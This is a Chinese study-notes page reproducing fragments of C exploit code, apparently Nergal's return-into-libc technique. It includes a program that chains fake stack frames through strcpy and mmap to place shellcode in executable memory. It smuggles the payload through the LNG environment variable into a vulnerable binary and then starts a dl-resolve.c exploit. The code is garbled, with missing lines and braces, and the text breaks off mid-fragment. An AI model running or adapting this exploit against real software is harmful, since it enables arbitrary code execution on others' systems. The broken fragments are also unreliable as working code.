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作者:闵涛 文章来源:闵涛的学习笔记 点击数:6546 更新时间:2009/4/25 0:45:30
p;  unsigned int start;
        unsigned int length;
        unsigned int prot;
        unsigned int flags;
        unsigned int fd;
        unsigned int offset;

struct ov {
        char scratch[24];
        unsigned int ebp;
        unsigned int eip;

struct ourbuf {
        struct two_arg zero1;
        struct two_arg zero2;
        struct mmap_args mymmap;
        struct two_arg trans;
        char hell[sizeof(hellcode)];

#define PTR_TO_NULL (FRAMES+sizeof(struct ourbuf))

main(int argc, char **argv)
        char lg[sizeof(struct ov) + sizeof(struct ourbuf) + 4 + 1];
        char *env[2] = { lg, 0 };
        struct ourbuf thebuf;
        struct ov theov;
        int i;

        memset(theov.scratch, ''''X'''', sizeof(theov.scratch));

        if (argc == 2 && !strcmp("testing", argv[1])) {
                for (i = 0; i < sizeof(theov.scratch); i++)
                        theov.scratch[i] = i + 0x10;
                theov.ebp = 0x01020304;
                theov.eip = 0x05060708;
        } else {
                theov.ebp = FRAMES;
                theov.eip = LEAVERET;
        thebuf.zero1.new_ebp = FRAMES + offsetof(struct ourbuf, zero2);
        thebuf.zero1.func = STRCPY;
        thebuf.zero1.leave_ret = LEAVERET;
        thebuf.zero1.param1 = FRAMES + offsetof(struct ourbuf, mymmap) +
            offsetof(struct mmap_args, offset);
        thebuf.zero1.param2 = PTR_TO_NULL;

        thebuf.zero2.new_ebp = FRAMES + offsetof(struct ourbuf, mymmap);
        thebuf.zero2.func = STRCPY;
        thebuf.zero2.leave_ret = LEAVERET;
        thebuf.zero2.param1 = FRAMES + offsetof(struct ourbuf, mymmap) +
            offsetof(struct mmap_args, start);
        thebuf.zero2.param2 = PTR_TO_NULL;

        thebuf.mymmap.new_ebp = FRAMES + offsetof(struct ourbuf, trans);
        thebuf.mymmap.func = MMAP;
        thebuf.mymmap.leave_ret = LEAVERET;
        thebuf.mymmap.start = MMAP_START + 1;
        thebuf.mymmap.length = 0x01020304;
        thebuf.mymmap.prot =
            0x01010100 | PROT_EXEC | PROT_READ | PROT_WRITE;
        /* again, careful not to include MAP_GROWS_DOWN below */
        thebuf.mymmap.flags =
            0x01010200 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS;
        thebuf.mymmap.fd = 0xffffffff;
        thebuf.mymmap.offset = 0x01021001;

        thebuf.trans.new_ebp = 0x01020304;
        thebuf.trans.func = STRCPY;
        thebuf.trans.leave_ret = MMAP_START + 1;
        thebuf.trans.param1 = MMAP_START + 1;
        thebuf.trans.param2 = FRAMES + offsetof(struct ourbuf, hell);

        memset(thebuf.hell, ''''x'''', sizeof(thebuf.hell));
        strncpy(thebuf.hell, hellcode, strlen(hellcode));

        strcpy(lg, "LNG=");
        memcpy(lg + 4, &theov, sizeof(theov));
        memcpy(lg + 4 + sizeof(theov), &thebuf, sizeof(thebuf));
        lg[4 + sizeof(thebuf) + sizeof(theov)] = 0;

        if (sizeof(struct ov) + sizeof(struct ourbuf) + 4 != strlen(lg)) {
                    "size=%i len=%i; zero(s) in the payload, correct it.\n",
                    sizeof(struct ov) + sizeof(struct ourbuf) + 4,
        execle("./vuln", "./vuln", 0, env, 0);

<++> dl-resolve.c
/* by Nergal */
#include <stdlib.h>
#include <elf.h>
#include <stdio.h>
#include <string.h>

#define STRTAB 0x8048240
#define SYMTAB 0x8048170
#define JMPREL 0x8048354
#define VERSYM 0x80482f8

#define PLT_SECTION "0x080483cc"

void graceful_exit()

void doit(int offset)
        int res;
        __asm__ volatile ("
            pushl $0x01011000
            pushl $0xffffffff
            pushl $0x00000032
            pushl $0x00000007
            pushl $0x01011000
            pushl $0xaa011000
            pushl %%ebx
            pushl %%eax

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